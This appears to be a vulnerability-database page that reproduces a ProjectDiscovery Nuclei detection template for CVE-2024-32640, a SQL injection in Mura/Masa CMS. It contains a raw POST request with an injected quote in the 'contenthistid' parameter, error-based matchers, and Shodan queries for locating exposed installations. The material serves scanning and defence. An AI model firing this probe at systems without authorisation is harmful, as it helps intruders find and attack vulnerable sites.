Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-32640
HistoryMay 07, 2024 - 8:25 p.m.

Mura/Masa CMS - SQL Injection

2024-05-0720:25:35
ProjectDiscovery
github.com
133
cve
sqli
cms
masa
masacms
unauthorized access
patch application

AI Score

7

Confidence

Low

The Mura/Masa CMS is vulnerable to SQL Injection.
id: CVE-2024-32640

info:
  name: Mura/Masa CMS - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Mura/Masa CMS is vulnerable to SQL Injection.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    Apply the vendor-supplied patch or update to a secure version.
  reference:
    - https://blog.projectdiscovery.io/hacking-apple-with-sql-injection/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32640
  metadata:
    verified: true
    max-request: 1
    vendor: masacms
    product: masacms
    shodan-query:
      - 'Generator: Masa CMS'
      - "generator: masa cms"
  tags: cve,cve2024,sqli,cms,masa,masacms

http:
  - raw:
      - |
        POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        object=displayregion&contenthistid=x\'&previewid=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains(header, "application/json")'
          - 'contains_all(body, "Unhandled Exception")'
          - 'contains_all(header,"cfid","cftoken")'
        condition: and
# digest: 490a0046304402206eccd0783b81a569061e6e996a33b917a1eca34bb2e26b04e47993cf4137690f02203413cd6642c7e01f2dbd3b6bf10fba063c483073a1da5349b56a666d945f008e:922c64590222798bb761d5b6d8e72950

AI Score

7

Confidence

Low

Related for NUCLEI:CVE-2024-32640